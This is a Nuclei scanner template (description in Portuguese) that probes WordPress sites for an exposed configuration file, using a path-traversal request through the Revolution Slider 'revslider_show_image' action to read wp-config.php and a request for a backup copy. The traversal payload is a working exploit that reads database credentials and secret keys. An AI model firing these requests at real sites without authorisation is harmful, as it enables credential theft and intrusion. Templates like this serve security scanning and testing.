id: kaue-wordpress-config-2

info:
  name: kaue-wordpress-config-2
  author: kauenavarro
  severity: high
  description: Procura por arquivo de configuração do wordpress.
  
requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
      - "{{BaseURL}}/wp-content/wp-config.php.bkp"

    matchers:
      - type: word
        words:
          - "define( 'WP_CACHE', true );"

        status:
          - 200
